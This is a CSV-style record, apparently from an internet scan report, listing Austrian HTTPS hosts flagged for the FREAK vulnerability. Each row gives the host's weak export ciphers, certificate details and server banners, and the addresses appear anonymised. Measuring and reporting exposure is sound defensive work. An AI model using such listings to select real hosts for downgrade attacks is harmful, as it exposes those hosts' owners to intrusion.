07:26:09,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,A0571920C03C9EE0DA1168E586E0E8D440E42EA69D898AC829,sha1WithRSAEncryption,rsaEncryption,,General,DE,SomeState,SomeCity,,,,,198-51-100-174.example.net,,,,General,DE,SomeState,SomeCity,,,,,198-51-100-174.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,Close,,,LANCOM 1781A 8.50.0161 / 09.08.2011,,,,Y,N,N,N,unknown,x509: unknown error
-2018-04-23 13:26:35,198.51.100.106,443,198-51-100-106.example.net,ssl-freak,TLSv1.0,12793,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-106.example.net,SHT-Gruppe CA,2004-07-20 07:28:10,2006-07-20 07:38:10,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,190DBE75000000000007,sha1WithRSAEncryption,rsaEncryption,,,AT,SomeState,SomeCity,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/6.0,1508,,"Mon, 23 Apr 2018 13:26:37 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority
-2018-04-23 13:26:37,198.51.100.191,443,,ssl-freak,TLSv1.0,8447,AT,STEIERMARK,LEBRING,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB669448,usg20_5CF4AB669448,2015-10-01 00:00:38,2035-09-26 00:00:38,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,560C77A6,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:40 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:42,198.51.100.235,443,198-51-100-235.example.net,ssl-freak,TLSv1.2,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_107BEF33651A,usg50_107BEF33651A,2014-04-24 00:00:27,2034-04-19 00:00:27,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,5358541B,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:45 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:43,198.51.100.167,443,198-51-100-167.example.net,ssl-freak,TLSv1.0,8412,AT,BURGENLAND,ELTENDORF,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-167.example.net,198-51-100-167.example.net,2008-08-19 06:57:11,2010-08-19 06:57:11,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2,sha1WithRSAEncryption,rsaEncryption,SuSE Linux Web Server,web server,XY,unknown,unknown,,,,,198-51-100-167.example.net,,,SuSE Linux Web Server,CA,XY,SomeState,unknown,,,,,198-51-100-167.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache/2.2.3 (Linux/SUSE),80,,"Mon, 23 Apr 2018 13:26:45 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority
-2018-04-23 13:26:47,198.51.100.42,443,198-51-100-42.example.net,ssl-freak,TLSv1.0,8437,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-42.example.net,iLO Default Issuer (Do not trust),2013-11-05 00:00:00,2028-11-04 00:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,72FD09EF,sha1WithRSAEncryption,rsaEncryption,,,US,SomeState,SomeCity,,,,,,,,,,US,SomeState,Houston,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,,,,,,,,,N,N,N,N,unknown,x509: certificate signed by unknown authority
-2018-04-23 13:26:48,198.51.100.177,443,198-51-100-177.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB625772,usg20_5CF4AB625772,2015-03-04 00:00:39,2035-02-27 00:00:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,54F64B27,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:50 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:48,198.51.100.66,443,198-51-100-66.example.net,ssl-freak,TLSv1.0,5385,AT,VORARLBERG,DORNBIRN,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-66.example.net,198-51-100-66.example.net,2009-10-06 11:23:48,2015-03-29 11:23:48,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,98B18BCD61B0CD5D,sha1WithRSAEncryption,rsaEncryption,,??,??,??,??,,,,,??,,,,??,??,??,??,,,,,??,,,518210,737415,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html; charset=utf-8,close,,DSSignInURL=/; path=/; secure,,,,,Y,Y,Y,N,unknown,x509: unknown error
-2018-04-23 13:26:48,198.51.100.29,443,198-51-100-29.example.net,ssl-freak,TLSv1.0,6830,AT,NIEDEROSTERREICH,GUNTRAMSDORF,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_FCF52878354B,usg20_FCF52878354B,2013-05-20 00:00:39,2033-05-15 00:00:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,519967A7,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:50 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:49,198.51.100.235,443,,ssl-freak,TLSv1.0,8447,AT,TIROL,KITZBUHEL,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_B0B2DC3AEFE7,usg50_B0B2DC3AEFE7,2012-10-30 00:02:36,2032-10-25 00:02:36,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,508F191C,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:52 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:50,198.51.100.159,443,,ssl-freak,TLSv1.0,8218,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-159.example.net,198-51-100-159.example.net,2002-01-09 20:22:25,2003-01-09 20:22:25,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,md5WithRSAEncryption,rsaEncryption,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-159.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-159.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,,Apache/1.3.33 (Unix)  (Red-Hat/Linux) FrontPage/4.,31,,"Mon, 23 Apr 2018 13:26:52 GMT",Y,Y,Y,N,unknown,x509: unknown error
-2018-04-23 13:26:51,198.51.100.138,443,198-51-100-138.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_B0B2DC34A1F6,usg20_B0B2DC34A1F6,2012-06-16 00:00:58,2032-06-11 00:00:58,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FDBCCBA,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:54 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:52,198.51.100.64,443,,ssl-freak,TLSv1.0,1853,AT,OBEROSTERREICH,WILHERING,TLS_RSA_WITH_RC4_128_SHA,1024,198.51.100.171,198.51.100.117,2017-08-10 10:48:40,2020-08-09 10:48:40,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,598C3A08,sha1WithRSAEncryption,rsaEncryption,,,,,SomeCity,,,,,,,,,,,,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,5597,,"Mon, 23 Apr 2018 13:26:54 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:55,198.51.100.189,443,198-51-100-62.example.net,ssl-freak,TLSv1.0,25255,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20w_107BEF3A4C9E,usg20w_107BEF3A4C9E,2014-07-04 00:00:43,2034-06-29 00:00:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,53B5EEAB,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:57 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:56,198.51.100.17,443,198-51-100-17.example.net,ssl-freak,TLSv1.0,8447,AT,STEIERMARK,SOEDING,TLS_RSA_WITH_AES_256_CBC_SHA,1024,Vimar By-Web,Vimar By-Web,2011-10-27 09:19:55,2016-10-25 09:19:55,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B82B13ED1FB0FD71,sha1WithRSAEncryption,rsaEncryption,,R&D,IT,SomeState,SomeCity,,,,,,,,,R&D,IT,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Moved Temporarily,text/html,keep-alive,,,nginx/0.6.32,,chunked,"Mon, 23 Apr 2018 13:26:56 GMT",Y,Y,Y,N,unknown,x509: unknown error
-2018-04-23 13:26:56,198.51.100.111,443,,ssl-freak,TLSv1.0,8218,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-111.example.net,198-51-100-111.example.net,2002-01-09 20:22:25,2003-01-09 20:22:25,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,md5WithRSAEncryption,rsaEncryption,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-111.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-111.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,,Apache/1.3.33 (Unix)  (Red-Hat/Linux) FrontPage/4.,31,,"Mon, 23 Apr 2018 13:26:58 GMT",Y,Y,Y,N,unknown,x509: unknown error
-2018-04-23 13:26:56,198.51.100.179,443,198-51-100-179.example.net,ssl-freak,TLSv1.0,12605,AT,OBEROSTERREICH,LINZ,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB665FB9,usg20_5CF4AB665FB9,2015-09-25 00:00:42,2035-09-20 00:00:42,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,56048EAA,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:58 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:58,198.51.100.143,443,,ssl-freak,TLSv1.0,8447,AT,KARNTEN,GLAN,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_FCF5285DEDC4,usg20_FCF5285DEDC4,2012-11-09 00:00:44,2032-11-04 00:00:44,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,509C47AC,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:27:00 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:58,198.51.100.111,443,198-51-100-111.example.net,ssl-freak,TLSv1.0,1901,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,*.*,198-51-100-111.example.net,2009-01-16 12:51:43,2010-01-16 12:51:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,6,md5WithRSAEncryption,rsaEncryption,,,IL,SomeState,,,,,,,,,,Visonic CA,IL,SomeState,,,,,,198-51-100-111.example.net,,,518210,737415,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html,close,,PowerLink=226002836046b4bddcd2d16b809f76d9; path=/,Apache/1.3.31 (Unix) PHP/4.3.9 mod_ssl/2.8.20 Open,,chunked,"Wed, 23 Jan 2002 10:17:09 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority
-2018-04-23 13:26:59,198.51.100.79,443,,ssl-freak,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB65A17C,usg20_5CF4AB65A17C,2015-09-01 00:00:51,2035-08-27 00:00:51,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,55E4EAB3,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:27:02 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:59,198.51.100.90,443,,ssl-freak,TLSv1.0,8218,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-90.example.net,198-51-100-90.example.net,2002-01-09 20:22:25,2003-01-09 20:22:25,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,md5WithRSAEncryption,rsaEncryption,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-90.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-90.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,,Apache/1.3.33 (Unix)  (Red-Hat/Linux) FrontPage/4.,31,,"Mon, 23 Apr 2018 13:27:02 GMT",Y,Y,Y,N,unknown,x509: unknown error
-2018-04-23 13:27:03,198.51.100.186,443,198-51-100-186.example.net,ssl-freak,TLSv1.0,31125,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-186.example.net,198-51-100-186.example.net,2013-07-11 12:20:19,2021-07-09 12:20:19,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,D947ED19BEAB28E6,sha1WithRSAEncryption,rsaEncryption,,IT,PL,SomeState,SomeCity,,,,,198-51-100-186.example.net,,,,IT,PL,SomeState,SomeCity,,,,,198-51-100-186.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,401,Unauthorized,text/plain,close,"Basic realm=""example.com""",,Microsoft-IIS/7.5,0,,"Mon, 23 Apr 2018 14:03:40 GMT",Y,Y,N,N,unknown,x509: unknown error
